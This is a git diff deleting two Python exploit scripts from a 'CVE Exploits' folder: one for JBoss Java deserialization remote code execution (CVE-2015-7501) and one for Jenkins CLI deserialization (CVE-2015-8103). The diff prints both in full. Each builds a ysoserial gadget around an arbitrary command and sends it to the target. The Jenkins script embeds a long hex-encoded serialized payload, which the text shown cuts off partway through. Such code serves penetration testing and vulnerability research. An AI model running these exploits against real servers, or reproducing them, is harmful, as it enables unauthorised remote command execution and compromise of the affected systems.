index 2ee8edc..0000000
--- a/CVE Exploits/JBoss CVE-2015-7501.py	
+++ /dev/null
@@ -1,62 +0,0 @@
-#! /usr/bin/env python2
-
-# Jboss Java Deserialization RCE (CVE-2015-7501)
-# Made with <3 by @byt3bl33d3r
-
-from __future__ import print_function
-import requests
-from requests.packages.urllib3.exceptions import InsecureRequestWarning
-requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
-
-import argparse
-import sys, os
-#from binascii import hexlify, unhexlify
-from subprocess import check_output
-
-ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
-ysoserial_path = None
-
-parser = argparse.ArgumentParser()
-parser.add_argument('target', type=str, help='Target IP')
-parser.add_argument('command', type=str, help='Command to run on target')
-parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
-parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
-
-if len(sys.argv) < 2:
-    parser.print_help()
-    sys.exit(1)
-
-args = parser.parse_args()
-
-if not args.ysoserial_path:
-    for path in ysoserial_default_paths:
-        if os.path.exists(path):
-            ysoserial_path = path
-else:
-    if os.path.exists(args.ysoserial_path):
-        ysoserial_path = args.ysoserial_path
-
-if ysoserial_path is None:
-    print('[-] Could not find ysoserial JAR file')
-    sys.exit(1)
-
-if len(args.target.split(":")) != 2:
-    print('[-] Target must be in format IP:PORT')
-    sys.exit(1)
-
-if not args.command:
-    print('[-] You must specify a command to run')
-    sys.exit(1)
-
-ip, port = args.target.split(':')
-
-print('[*] Target IP: {}'.format(ip))
-print('[*] Target PORT: {}'.format(port))
-
-gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
-
-r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
-
-if r.status_code == 200:
-    print('[+] Command executed successfully')
-
diff --git a/CVE Exploits/Jenkins CVE-2015-8103.py b/CVE Exploits/Jenkins CVE-2015-8103.py
deleted file mode 100644
index 804736c..0000000
--- a/CVE Exploits/Jenkins CVE-2015-8103.py	
+++ /dev/null
@@ -1,88 +0,0 @@
-#! /usr/bin/env python2
-
-#Jenkins CLI RMI Java Deserialization RCE (CVE-2015-8103)
-#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)
-#Made with <3 by @byt3bl33d3r
-
-from __future__ import print_function
-import requests
-from requests.packages.urllib3.exceptions import InsecureRequestWarning
-requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
-
-import socket
-import sys
-import base64
-import argparse
-import os
-from subprocess import check_output
-
-ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
-ysoserial_path = None
-
-parser = argparse.ArgumentParser()
-parser.add_argument('target', type=str, help='Target IP:PORT')
-parser.add_argument('command', type=str, help='Command to run on target')
-parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
-parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
-
-if len(sys.argv) < 2:
-    parser.print_help()
-    sys.exit(1)
-
-args = parser.parse_args()
-
-if not args.ysoserial_path:
-    for path in ysoserial_default_paths:
-        if os.path.exists(path):
-            ysoserial_path = path
-else:
-    if os.path.exists(args.ysoserial_path):
-        ysoserial_path = args.ysoserial_path
-
-if ysoserial_path is None:
-    print("[-] Could not find ysoserial JAR file")
-    sys.exit(1)
-
-if len(args.target.split(':')) != 2:
-    print('[-] Target must be in format IP:PORT')
-    sys.exit(1)
-
-if not args.command:
-    print('[-] You must specify a command to run')
-    sys.exit(1)
-
-host, port = args.target.split(':')
-
-print('[*] Target IP: {}'.format(host))
-print('[*] Target PORT: {}'.format(port))
-print('\n')
-
-print('[*] Retrieving the Jenkins CLI port')
-#Query Jenkins over HTTP to find what port the CLI listener is on
-r = requests.get('{}://{}:{}'.format(args.proto, host, port))
-cli_port = int(r.headers['X-Jenkins-CLI-Port'])
-
-#Open a socket to the CLI port
-sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-server_address = (host, cli_port)
-print('[*] Connecting to Jenkins CLI on {}:{}'.format(host, cli_port))
-sock.connect(server_address)
-
-# Send headers
-headers='\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74'
-print('[*] Sending headers')
-sock.send(headers)
-
-data = sock.recv(1024)
-print('[*] Received "{}"'.format(data))
-
-if data.find('JENKINS REMOTING CAPACITY') == -1:
-    data = sock.recv(1024)
-    print('[*] Received "{}"'.format(data))
-
-payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections3', args.command])
-payload_b64 = base64.b64encode(payloadObj)
-payload='\x3c\x3d\x3d\x3d\x5b\x4a\x45\x4e\x4b\x49\x4e\x53\x20\x52\x45\x4d\x4f\x54\x49\x4e\x47\x20\x43\x41\x50\x41\x43\x49\x54\x59\x5d\x3d\x3d\x3d\x3e'+payload_b64+'\x00\x00\x00\x00\x11\x2d\xac\xed\x00\x05\x73\x72\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x4c\x00\x10\x63\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x50\x72\x6f\x78\x79\x74\x00\x30\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x3b\x5b\x00\x07\x72\x65\x71\x75\x65\x73\x74\x74\x00\x02\x5b\x42\x4c\x00\x08\x74\x6f\x53\x74\x72\x69\x6e\x67\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x03\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x0c\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x03\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x3c\x74\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x74\x00\x10\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x04\x63\x61\x6c\x6c\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x3c\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x70\x73\x7d\x00\x00\x00\x02\x00\x2e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x00\x1c\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x49\x52\x65\x61\x64\x52\x65\x73\x6f\x6c\x76\x65\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x05\x5a\x00\x14\x61\x75\x74\x6f\x55\x6e\x65\x78\x70\x6f\x72\x74\x42\x79\x43\x61\x6c\x6c\x65\x72\x5a\x00\x09\x67\x6f\x69\x6e\x67\x48\x6f\x6d\x65\x49\x00\x03\x6f\x69\x64\x5a\x00\x09\x75\x73\x65\x72\x50\x72\x6f\x78\x79\x4c\x00\x06\x6f\x72\x69\x67\x69\x6e\x71\x00\x7e\x00\x0d\x78\x70\x00\x00\x00\x00\x00\x02\x00\x73\x71\x00\x7e\x00\x0b\x71\x00\x7e\x00\x43\x74\x00\x78\x50\x72\x6f\x78\x79\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x40\x32\x20\x77\x61\x73\x20\x63\x72\x65\x61\x74\x65\x64\x20\x66\x6f\x72\x20\x69\x6e\x74\x65\x72\x66\x61\x63\x65\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x75\x71\x00\x7e\x00\x11\x00\x00\x00\x0d\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x7d\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x89\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x74\x00\x04\x77\x72\x61\x70\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x6a\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x06\x65\x78\x70\x6f\x72\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x02\xa6\x74\x00\x21\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x74\x00\x16\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x4a\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x46\x71\x00\x7e\x00\x1d\x71\x00\x7e\x00\x1e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x22\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x71\x00\x7e\x00\x28\x70\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x2b\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x71\x00\x7e\x00\x30\x71\x00\x7e\x00\x31\x71\x00\x7e\x00\x32\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x34\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x36\x71\x00\x7e\x00\x3a\x78\x78\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x07\x46\xac\xed\x00\x05\x73\x72\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\x49\x00\x03\x6f\x69\x64\x5b\x00\x09\x61\x72\x67\x75\x6d\x65\x6e\x74\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x05\x74\x79\x70\x65\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x77\x08\xff\xff\xff\xfe\x00\x00\x00\x02\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x77\x04\x00\x00\x00\x00\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x02\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x0b\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x02\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x39\x74\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xf6\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x71\x00\x7e\x00\x1e\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\